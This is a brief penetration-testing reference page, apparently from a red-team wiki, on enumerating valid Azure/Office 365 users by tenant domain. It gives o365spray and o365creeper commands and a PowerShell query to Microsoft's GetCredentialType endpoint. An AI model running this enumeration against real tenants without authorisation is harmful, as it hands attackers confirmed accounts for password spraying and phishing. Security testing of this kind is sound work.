User Spraying

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Recommendations

Vulnerability

Knowing the domain name associated with an Azure tenant, you can perform a spraying attack to identify existing users.

Prerequisites

  • Internet connection.

Exploit

Use O365Spray.

# First, validate the domain exists.
o365spray --validate --domain $DomainName

# Then, perform user spraying.
o365spray --enum -U Usernames.txt --domain $DomainName

Using O365Creeper, you can spray emails without specifying a domain. It will output emails that belong to an Azure tenant.

# Yeah, it only works with Python 2...
python2.7 o365creeper.py -f Emails.txt -o ValidEmails.txt

You can also check whether a single user exists by querying the GetCredentialType endpoint directly.

# Returns 0 or 6 if the username exists.
$Body = @{ username = "$Email"; isOtherIdpSupported = $true } | ConvertTo-Json
Invoke-RestMethod -Uri "https://login.microsoftonline.com/common/GetCredentialType" -ContentType "application/json" -Method POST -Body $Body | Select-Object -ExpandProperty IfExistsResult

# With AADInternals.
Get-AADIntLoginInformation -UserName $Email

Recommendations

  • Nothing to do here; this exploit is possible by design.